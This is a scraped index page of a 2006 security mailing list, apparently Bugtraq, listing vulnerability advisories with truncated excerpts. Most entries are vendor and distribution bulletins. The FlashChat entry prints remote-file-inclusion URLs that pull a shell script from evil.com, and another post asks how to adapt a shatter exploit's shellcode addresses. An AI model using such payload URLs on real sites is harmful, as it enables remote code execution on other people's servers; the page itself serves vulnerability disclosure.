|
|
Colapse all |
Post message
Microsoft confirmed Word 0-day vulnerability 2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi) IBM Lotus Notes DUNZIP32.dll Buffer Overflow Vulnerability 2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi) Networksecurity.fi Security Advisory (06-09-2006) Title: IBM Lotus Notes DUNZIP32.dll buffer overflow vulnerability Criticality: High (3/3) Affected software: IBM Lotus Notes versions 6.5.4, 5.0.10 and prior Author: Juha-Matti Laurio juha-matti.laurio [at] netti.fi Date: 6th September, 2006 Advis [ more ] [ reply ] [ GLSA 200609-03 ] OpenTTD: Remote Denial of Service 2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200609-04 ] LibXfont: Multiple integer overflows 2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [security bulletin] HPSBUX02102 SSRT051078 rev.4 - HP-UX usermod(1M) Local Unauthorized Access. 2006-09-06 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00614838 Version: 4 HPSBUX02102 SSRT051078 rev.4 - HP-UX usermod(1M) Local Unauthorized Access. NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Relea [ more ] [ reply ] [SECURITY] [DSA 1170-1] New fastjar packages fix directory traversal 2006-09-06 joey infodrom org (Martin Schulze) [ GLSA 200609-02 ] GTetrinet: Remote code execution 2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [ GLSA 200609-01 ] Streamripper: Multiple remote buffer overflows 2006-09-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) release uhooker v1.2 2006-09-06 Hernan Ochoa (lists core-sdi com) uhooker v1.2 out. What's new?: http://oss.coresecurity.com/uhooker/release/1.2/WHATSNEW_1.2.txt gzip'd tarball: http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.tgz zip file: http://oss.coresecurity.com/uhooker/release/1.2/uhooker_v1.2.zip documentation: http://oss.coresecurity.com/uhoo [ more ] [ reply ] Canon ImageRunner reveals SMB, IPX, and FTP username/passwords 2006-09-05 gunrnr earthlink net The Canon ImageRunner multi-function device?s Remote UI web interface software will reveal username and password pairs contained in address book entries when the address book is exported. These address book entries are used for scanning to SMB, FTP, or IPX shares. In addition, passwords for passwo [ more ] [ reply ] Details for BID 19586 2006-09-06 shulman imperva com DB2 UDB - Handshake Protocol DoS Attack (BID 19586) Background: DB2 Universal Database (UDB)? is a popular database software package from IBM available for legacy platforms as well as open systems (Unix and Windows). Clients use a protocol called DRDA to communicate with the DB2 UDB server. Prot [ more ] [ reply ] Details for BID 18428 2006-09-06 shulman imperva com DB2 UDB - Unauthenticated Buffer Overflow and DoS (BID 18428) Background: DB2 Universal Database (UDB)? is a popular database software package from IBM available for legacy platforms as well as open systems (Unix and Windows). Clients use a protocol called DRDA to communicate with the DB2 UDB se [ more ] [ reply ] Re: Microsoft Word 0-day Vulnerability (September) FAQ document available 2006-09-06 Juha-Matti Laurio (juha-matti laurio netti fi) New information about the Microsoft Word zero-day vulnerability is available and FAQ document at http://blogs.securiteam.com/?p=586 has been updated. This issue has been assigned to CVE-2006-4534, URL http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4534 will work in the near future. There [ more ] [ reply ] Reminder: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA 2006-09-06 Dave Wichers (dave wichers aspectsecurity com) A reminder to everyone that early registration for the OWASP conference in Seattle next month ends on September 21st. There is a $50 discount for early registration. More importantly, the block of rooms and rates at the conference hotels are only guaranteed to be held until around that same date. A [ more ] [ reply ] [USN-340-1] imagemagick vulnerabilities 2006-09-06 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-340-1 September 06, 2006 imagemagick vulnerabilities CVE-2006-3743, CVE-2006-3744 =========================================================== A security issue affects the following Ubuntu releases: Ubun [ more ] [ reply ] Anti-vir2 2006-09-04 rugginello gmail com By the way i'm using the progress control shatter exploit by brett mooore, but i'm having problem with the setHandler (critical address to overwrite) and shellcodeaddr (data space to inject the code). Probably they are windows dependent. Do you know if there is the possibility to write a portable [ more ] [ reply ] Easy Address Book Web Server Format String Vulnerability 2006-09-04 revnic gmail com Easy Address Book Web Server Format String Vulnerability Software: Easy Address Book Web Server Version: 1.2 Website: http://www.efssoft.com/ Description: Easy Address Book Web Server is a Web Address Book software that allows users to view, search, add, edit, or administer address books ea [ more ] [ reply ] in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit 2006-09-03 saudi unix hotmail com rPSA-2006-0163-1 openssl openssl-scripts 2006-09-05 rPath Update Announcements (announce-noreply rpath com) rPath Security Advisory: 2006-0163-1 Published: 2006-09-05 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.3-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0 [ more ] [ reply ] AuditWizard 6.3.2 gives away administrator password 2006-09-05 Terry Donaldson (tdx14145 yahoo com) I found that AuditWizard 6.3.2 by Layton Technologies is leaving the domain administrator password in the logfiles of machines that it audits if you use the Remote Audit feature. I've contacted them but they have yet to produce a fix. They have acknowledged the problem but according to their te [ more ] [ reply ] FlashChat <= 4.5.7 Remote File Include Vulnerability 2006-09-04 mc nadz gmail com NeXtMaN <mc.nadz [at] gmail.com> Here are 2 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http:/ /evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http:/ /evil.com/shell.txt? video he [ more ] [ reply ] UPDATE: [ GLSA 200509-09 ] Py2Play: Remote execution of arbitrary Python code 2006-09-05 Sune Kloppenborg Jeppesen (jaervosz gentoo org) [security bulletin] HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access 2006-09-05 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00760969 Version: 1 HPSBUX02145 SSRT061202 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), and Unauthorized Access NOTICE: The information in this Sec [ more ] [ reply ] |
|
Privacy Statement |
It is also reported that Word Viewer application is not affected.
As a workaround it is possible to avoid opening Word files from unrusted sources, including e-mail, Web p
[ more ] [ reply ]